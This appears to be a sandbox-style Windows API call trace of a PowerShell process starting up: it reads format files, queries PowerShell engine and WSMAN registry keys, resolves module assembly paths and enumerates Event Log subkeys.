	[0811.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0811.519] SetErrorMode (uMode=0x1) returned 0x1
	[0811.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0811.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0811.519] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0811.519] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0811.519] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0811.519] CoTaskMemFree (pv=0x2b6db0) 
	[0811.520] RegCloseKey (hKey=0x2ec) returned 0x0
	[0811.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0811.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0811.522] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x30d7f29b, Data2=0x9c1b, Data3=0x4863, Data4=([0]=0xab, [1]=0x39, [2]=0x37, [3]=0x8, [4]=0x3e, [5]=0x73, [6]=0x77, [7]=0x57))) returned 0x0
	[0811.523] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1b393a49, Data2=0x13e5, Data3=0x47c8, Data4=([0]=0x8f, [1]=0x98, [2]=0x1, [3]=0x7c, [4]=0x53, [5]=0x17, [6]=0xfc, [7]=0xef))) returned 0x0
	[0811.523] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0811.524] GetFileType (hFile=0x2ec) returned 0x1
	[0811.524] SetErrorMode (uMode=0x1) returned 0x1
	[0811.524] GetFileType (hFile=0x2ec) returned 0x1
	[0811.524] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.525] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.526] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.526] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0811.528] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0xe98, lpOverlapped=0x0) returned 1
	[0811.528] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f4c68, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f4c68*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0811.528] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x36f5668*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0811.528] CloseHandle (hObject=0x2ec) returned 1
	[0811.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0811.529] SetErrorMode (uMode=0x1) returned 0x1
	[0811.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0811.529] SetErrorMode (uMode=0x1) returned 0x1
	[0811.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0811.529] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0811.529] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0811.530] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0811.530] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0811.530] CoTaskMemFree (pv=0x2b6db0) 
	[0811.530] RegCloseKey (hKey=0x2ec) returned 0x0
	[0811.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0811.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0812.816] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x203b741f, Data2=0x9bb3, Data3=0x449e, Data4=([0]=0xbb, [1]=0x10, [2]=0x0, [3]=0xc3, [4]=0x70, [5]=0x4c, [6]=0x3f, [7]=0xef))) returned 0x0
	[0812.817] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xefbfed83, Data2=0x9920, Data3=0x4ff1, Data4=([0]=0xab, [1]=0x2f, [2]=0xe7, [3]=0x4, [4]=0x67, [5]=0xab, [6]=0x5e, [7]=0x89))) returned 0x0
	[0812.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0812.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0812.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0812.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0812.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0812.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0812.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0814.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0814.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0814.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0814.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0814.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0814.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0814.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0815.484] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.484] CoTaskMemFree (pv=0x2b4a20) 
	[0815.486] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.486] CoTaskMemFree (pv=0x2b4a20) 
	[0815.487] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.487] CoTaskMemFree (pv=0x2b4a20) 
	[0815.489] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.489] CoTaskMemFree (pv=0x2b4a20) 
	[0815.503] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.503] CoTaskMemFree (pv=0x2b4a20) 
	[0815.506] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.506] CoTaskMemFree (pv=0x2b4a20) 
	[0815.506] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0815.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.506] CoTaskMemFree (pv=0x2b4a20) 
	[0815.513] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6b8 | out: phkResult=0x16d6b8*=0x2ec) returned 0x0
	[0815.516] RegQueryInfoKeyW (in: hKey=0x2ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0815.516] CoTaskMemFree (pv=0x0) 
	[0815.517] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0815.517] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x0, lpValueName=0x25aca0, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.517] CoTaskMemFree (pv=0x25aca0) 
	[0815.517] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0815.518] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x1, lpValueName=0x25aca0, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.518] CoTaskMemFree (pv=0x25aca0) 
	[0815.518] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0815.518] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x2, lpValueName=0x25aca0, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.518] CoTaskMemFree (pv=0x25aca0) 
	[0815.518] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d64c, lpData=0x0, lpcbData=0x16d648*=0x0 | out: lpType=0x16d64c*=0x1, lpData=0x0, lpcbData=0x16d648*=0x8) returned 0x0
	[0815.519] CoTaskMemAlloc (cb=0xc) returned 0x2b7f00
	[0815.519] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d61c, lpData=0x2b7f00, lpcbData=0x16d618*=0x8 | out: lpType=0x16d61c*=0x1, lpData="2.0", lpcbData=0x16d618*=0x8) returned 0x0
	[0815.519] CoTaskMemFree (pv=0x2b7f00) 
	[0816.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x300) returned 0x0
	[0816.873] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d50c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d508, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d50c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d508*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0816.873] CoTaskMemFree (pv=0x0) 
	[0816.873] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0816.873] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x25aca0, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.873] CoTaskMemFree (pv=0x25aca0) 
	[0816.873] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0816.873] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x25aca0, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.873] CoTaskMemFree (pv=0x25aca0) 
	[0816.873] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0816.874] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x25aca0, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0816.874] CoTaskMemFree (pv=0x25aca0) 
	[0816.874] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d59c, lpData=0x0, lpcbData=0x16d598*=0x0 | out: lpType=0x16d59c*=0x1, lpData=0x0, lpcbData=0x16d598*=0x8) returned 0x0
	[0816.874] CoTaskMemAlloc (cb=0xc) returned 0x2b7e80
	[0816.874] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d56c, lpData=0x2b7e80, lpcbData=0x16d568*=0x8 | out: lpType=0x16d56c*=0x1, lpData="2.0", lpcbData=0x16d568*=0x8) returned 0x0
	[0816.874] CoTaskMemFree (pv=0x2b7e80) 
	[0816.875] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0816.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.875] CoTaskMemFree (pv=0x2b4a20) 
	[0816.880] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0816.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.880] CoTaskMemFree (pv=0x2b4a20) 
	[0818.338] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x30c) returned 0x0
	[0818.342] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.342] CoTaskMemFree (pv=0x0) 
	[0818.343] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.343] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.344] CoTaskMemFree (pv=0x25aca0) 
	[0818.344] CoTaskMemFree (pv=0x0) 
	[0818.344] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.344] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.344] CoTaskMemFree (pv=0x25aca0) 
	[0818.344] CoTaskMemFree (pv=0x0) 
	[0818.344] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.344] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.344] CoTaskMemFree (pv=0x25aca0) 
	[0818.344] CoTaskMemFree (pv=0x0) 
	[0818.344] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.344] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.344] CoTaskMemFree (pv=0x25aca0) 
	[0818.344] CoTaskMemFree (pv=0x0) 
	[0818.344] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.344] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.344] CoTaskMemFree (pv=0x25aca0) 
	[0818.344] CoTaskMemFree (pv=0x0) 
